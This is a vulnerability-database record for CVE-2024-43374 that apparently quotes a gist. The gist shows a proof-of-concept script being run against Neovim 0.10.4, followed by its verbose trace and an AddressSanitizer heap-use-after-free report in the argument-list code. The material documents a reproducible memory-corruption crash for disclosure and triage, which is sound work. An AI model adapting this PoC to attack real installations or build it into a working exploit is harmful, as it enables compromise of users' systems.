{"uuid": "65b3e556-5294-43b2-aa21-13d9a7f7ab04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-43374", "type": "seen", "source": "https://gist.github.com/zhuozhenwei/fac94632a3c276db37727514a35608fd", "content": "Command:\n./nvim-0.10.4 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c qa!\n\n=== OUTPUT ===\nExecuting:     vnoremenu PopUp.Cut                     \"+x\n\nExecuting:     vnoremenu PopUp.Copy                    \"+y\n\nExecuting:     anoremenu PopUp.Paste                   \"+gP\n\nExecuting:     vnoremenu PopUp.Paste                   \"+P\n\nExecuting:     vnoremenu PopUp.Delete                  \"_x\n\nExecuting:     nnoremenu PopUp.Select\\ All             ggVG\n\nExecuting:     vnoremenu PopUp.Select\\ All             gg0oG$\n\nExecuting:     inoremenu PopUp.Select\\ All             VG\n\nExecuting:     anoremenu PopUp.Inspect                 Inspect\n\nExecuting:     anoremenu PopUp.-1-                     \n\nExecuting:     anoremenu PopUp.How-to\\ disable\\ mouse  help disable-mouse\n\nExecuting:   \n\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1:  \n\nline 2: an^?|\n\nError detected while processing command line..script /home/zzw/Desktop/CVEID2426/CVE-2024-43374/poc:\nline    2:\nE329: No menu \"^?\"\nline 3: au    BufNew  ile,,3,^S,*,*,.gRowseiq,*,*.^la^?^I:bw\n\nline 4: n^R^R^R^R^R^R^R^R^R^Rightbw\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nline 5: we^?\n\nline    5:\nE492: Not an editor command: we^?\nline 6: 0sv]&lt;88&gt;N,\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nline    6:\nE444: Cannot close last window\nline 7: \n\nline 8: diffs\n\nline 8: set sbo+=hor\n\nline 9: daru&lt;82&gt;e^Hw/\n\nline    9:\nE492: Not an editor command: daru&lt;82&gt;e^Hw/\nline 10: lv}$}\"\n\n\"\"\"\" [New]\nCannot open file \"\"\"\nline   10:\nE480: No match: $\nline 11: ;$\n\nline 12: dif&lt;99&gt;s@^?]^Pcl{{0^\\db\n\nline   12:\nE488: Trailing characters: &lt;99&gt;s@^?]^Pcl{{0^\\db: dif&lt;99&gt;s@^?]^Pcl{{0^\\db\nline 13: argl{{0}2\n\nExecuting command: \"[[ ${BASH_VERSINFO[0]} -ge 4 ]] &amp;&amp; shopt -s globstar; vimglob() { while [ $# -ge 1 ]; do echo \"$1\"; shift; done }; vimglob &gt;/tmp/nvim.zzw/oo5n4h/0 {{0}2\"\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nError detected while processing command line..script /home/zzw/Desktop/CVEID2426/CVE-2024-43374/poc[13]..BufNew Autocommands for \"*\":\nE1156: Cannot change the argument list recursively\nExecuting: diffoff!\n\nExecuting: set sbo-=hor\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n=================================================================\n==107413==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000005b40 at pc 0x00000065f45d bp 0x7ffdd2eb5d30 sp 0x7ffdd2eb5d28\nREAD of size 8 at 0x603000005b40 thread T0\n    #0 0x65f45c in alist_add /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:221:5\n    #1 0x65f26e in alist_set /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:191:7\n    #2 0x66014a in do_arglist /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:468:7\n    #3 0x662209 in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:705:11\n    #4 0x661405 in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:546:5\n    #5 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #6 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #7 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #8 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #9 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #10 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #11 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #12 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #13 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #14 0x9b9153 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:374:10\n    #15 0xc0acf9 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1909:5\n    #16 0xbfedf4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:594:5\n    #17 0x7f99cebb7082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n    #18 0x47000d in _start (/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x47000d)\n\n0x603000005b40 is located 16 bytes inside of 32-byte region [0x603000005b30,0x603000005b50)\nfreed by thread T0 here:\n    #0 0x4e84cd in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x4e84cd)\n    #1 0xce9119 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:144:3\n    #2 0x65ede3 in alist_unlink /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:116:5\n    #3 0x12ce2de in win_free /home/zzw/Desktop/neovim/build/../src/nvim/window.c:5207:3\n    #4 0x12c48bb in win_free_mem /home/zzw/Desktop/neovim/build/../src/nvim/window.c:3100:3\n    #5 0x12a0a8c in win_close /home/zzw/Desktop/neovim/build/../src/nvim/window.c:2858:8\n    #6 0x693e43 in do_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1391:11\n    #7 0x6984f7 in do_bufdel /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1057:5\n    #8 0x9ea833 in ex_bunload /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:4467:17\n    #9 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #10 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #11 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #12 0x67b3df in apply_autocmds_group /home/zzw/Desktop/neovim/build/../src/nvim/autocmd.c:1830:5\n    #13 0x67ff56 in apply_autocmds /home/zzw/Desktop/neovim/build/../src/nvim/autocmd.c:1498:10\n    #14 0x69802d in buflist_new /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:2009:9\n    #15 0x6a4d75 in buflist_add /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:3091:16\n    #16 0x65f42d in alist_add /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:222:7\n    #17 0x65f26e in alist_set /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:191:7\n    #18 0x66014a in do_arglist /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:468:7\n    #19 0x662209 in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:705:11\n    #20 0x661405 in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:546:5\n    #21 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #22 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #23 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #24 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #25 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #26 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #27 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #28 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #29 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n\npreviously allocated by thread T0 here:\n    #0 0x4e874d in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x4e874d)\n    #1 0xce8ef7 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:98:15\n    #2 0xce90c4 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:132:15\n    #3 0x65ee01 in alist_new /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:123:21\n    #4 0x66136a in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:536:7\n    #5 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #6 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #7 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #8 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #9 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #10 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #11 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #12 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #13 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #14 0x9b9153 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:374:10\n    #15 0xc0acf9 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1909:5\n    #16 0xbfedf4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:594:5\n    #17 0x7f99cebb7082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:221:5 in alist_add\nShadow bytes around the buggy address:\n  0x0c067fff8b10: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd\n  0x0c067fff8b20: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa\n  0x0c067fff8b30: 00 00 05 fa fa fa fd fd fd fa fa fa fd fd fd fd\n  0x0c067fff8b40: fa fa 00 00 02 fa fa fa fd fd fd fd fa fa 00 00\n  0x0c067fff8b50: 00 06 fa fa fd fd fd fd fa fa fd fd fd fa fa fa\n=&gt;0x0c067fff8b60: 00 00 04 fa fa fa fd fd[fd]fd fa fa fd fd fd fa\n  0x0c067fff8b70: fa fa 00 00 06 fa fa fa fd fd fd fa fa fa fd fd\n  0x0c067fff8b80: fd fa fa fa fd fd fd fd fa fa fd fd fd fd fa fa\n  0x0c067fff8b90: fd fd fd fd fa fa fd fd fd fa fa fa fd fd fd fa\n  0x0c067fff8ba0: fa fa fd fd fd fa fa fa fd fd fd fd fa fa fd fd\n  0x0c067fff8bb0: fd fa fa fa fd fd fd fd fa fa 00 00 00 04 fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n  Addressable:           00\n  Partially addressable: 01 02 03 04 05 06 07 \n  Heap left redzone:       fa\n  Freed heap region:       fd\n  Stack left redzone:      f1\n  Stack mid redzone:       f2\n  Stack right redzone:     f3\n  Stack after return:      f5\n  Stack use after scope:   f8\n  Global redzone:          f9\n  Global init order:       f6\n  Poisoned by user:        f7\n  Container overflow:      fc\n  Array cookie:            ac\n  Intra object redzone:    bb\n  ASan internal:           fe\n  Left alloca redzone:     ca\n  Right alloca redzone:    cb\n  Shadow gap:              cc\n==107413==ABORTING", "creation_timestamp": "2026-06-08T10:57:49.000000Z"}